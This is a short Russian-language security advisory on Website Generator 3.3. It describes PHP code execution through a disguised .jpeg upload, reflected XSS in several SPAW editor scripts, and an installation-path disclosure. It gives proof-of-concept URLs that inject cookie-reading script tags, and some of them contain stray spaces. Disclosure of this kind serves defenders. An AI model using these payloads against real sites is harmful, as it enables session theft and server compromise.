Программа: Website Generator 3.3 

Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе.
Удаленный пользователь может загрузить файл с расширением .jpeg, содержащий PHP код и затем выполнить его на целевой системе.
Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. 

Примеры:

http://[target]/[path]/spaw/img_popup.php?img_url=" %20border="0"/><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/colo rpicker.php? theme="><body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/table.php?theme="> < body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/td.php?theme="> < body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/confirm.php?theme="> < body><script>aler t(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/a.php?theme="> < body><script>alert(document.cookie)</script>

http://[target]/[path]/spaw/dialogs/banner_l ibrary.php? theme="><body><script>alert(document.cookie)</script>

Удаленный пользователь может получить данные об установочной директории приложения на сервере с помощью специально сформированного URL. 

Пример:

http://[target]/[path]/spaw/spaw_control.class.php

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии